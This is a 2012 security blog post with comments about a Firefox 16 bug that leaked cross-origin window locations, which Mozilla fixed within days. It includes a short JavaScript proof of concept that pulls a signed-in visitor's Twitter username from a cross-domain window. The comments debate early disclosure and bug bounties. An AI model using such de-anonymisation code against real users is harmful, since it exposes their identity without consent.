Firefox knows what your friends did last summer
Wednesday, 10 October 2012
Update…
Mozilla have now fixed the problem on Thursday. Not only did they take down the original release but fixed it very quickly within two days which is very impressive. Good work!
I was writing some JavaScript and found that the following happens:
/undefined/.test(undefined)//true
The undefined value is converted to a string and then the test returns true. It surprised me but wasn’t totally unexpected but then I thought if a string conversion is being done inside the native function then perhaps we can abuse that? Oh yes we can π I thought how about we apply this to a x-domain protected object. E.g. location of an external iframe. /businessinfo\.co\.uk/.test(document.getElementById(‘x’).contentWindow.location) worked! But wait if a test works then so could exec and we can get the location from a x-domain. /(.+)/.exec(loc); also works since the x-domain object is being converted to a string in the exec function too.
First thing I thought was I can use twitter to identify the user π but how? /home doesn’t return a unique url, I was searching through twitter to see what urls redirected to a unique url when I found /lists which redirects to twitter.com/uid/lists π perfect.
Here’s how the PoC works. You need to be signed into twitter using https. The PoC then opens a new window to the /lists url on twitter. Waits 5 seconds, then calls a regex on the x-domain object to reveal the twitter username.
function poc() {
var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200,height=200');
setTimeout(function(){
alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
}, 5000);
}
There you have it Firefox is a little to lax with the location object.
No. 1 — October 10th, 2012 at 3:14 pm
It appears alert(document.getElementById(‘x’).contentWindow.location) works too. It seems that it’s unrelated to the string conversion and that Firefox is in fact leaking location anyway.
No. 2 — October 10th, 2012 at 3:38 pm
In Firefox 15.0.1, I get this error in the console when I run your PoC:
Error: Permission denied for to call method Location.toString
Which is what you’d normally expect when accessing window.location cross-domain. What version of FF did you test this in?
No. 3 — October 10th, 2012 at 3:39 pm
Firefox 16.0
http://shazzer.co.uk/database/All/is-my-browser-leaking-location?privateKey=
No. 4 — October 10th, 2012 at 3:53 pm
Yeah, I updated to 16 and your PoC – so it’s a recent regression. However just doing alert(win.location) also works, so it looks like the funky regex stuff isn’t actually needed.
No. 5 — October 10th, 2012 at 4:08 pm
Yeah I realised that after the blog post π but that was my thinking to how I discovered it.
No. 6 — October 11th, 2012 at 7:32 am
https://blog.mozilla.org/security/2012/10/10/security-vulnerability-in-firefox-16/
Nice one π
No. 7 — October 11th, 2012 at 9:08 am
Why did you disclose this before Mozilla was able to fix this?
No. 8 — October 11th, 2012 at 11:02 am
LOL @Wess π
As always, nice one Gareth!
No. 9 — October 11th, 2012 at 11:09 am
>Why did you disclose this before Mozilla was able to fix this?
He missed out on a 3000 USD bug bounty by doing so. (Maybe the publicity was worth it, I don’t know)
No. 10 — October 11th, 2012 at 11:20 am
@Gian-Carlo
I think Mozilla taking FF16 down is reward enough. Publicity LOL. 3K LOL.
No. 11 — October 11th, 2012 at 4:47 pm
>Why did you disclose this before Mozilla was able to fix this?
^Gryf.
>I think Mozilla taking FF16 down is reward enough. Publicity LOL. 3K LOL.
GG OP. π
No. 12 — October 12th, 2012 at 10:24 am
getting a bug bounty is unrelated to disclosure. you can submit it to mozilla *and* do a blog post to get the bug bounty π they don’t buy your silence. they only buy your bug.
No. 13 — October 12th, 2012 at 10:37 am
LOL I’ve exploited you all mentally. You cannot understand why I didn’t take the cash. You then say it’s for publicity LOL because it hurts your logic circuits. Listen I love bugs, so did everyone else now most of you love your bounty.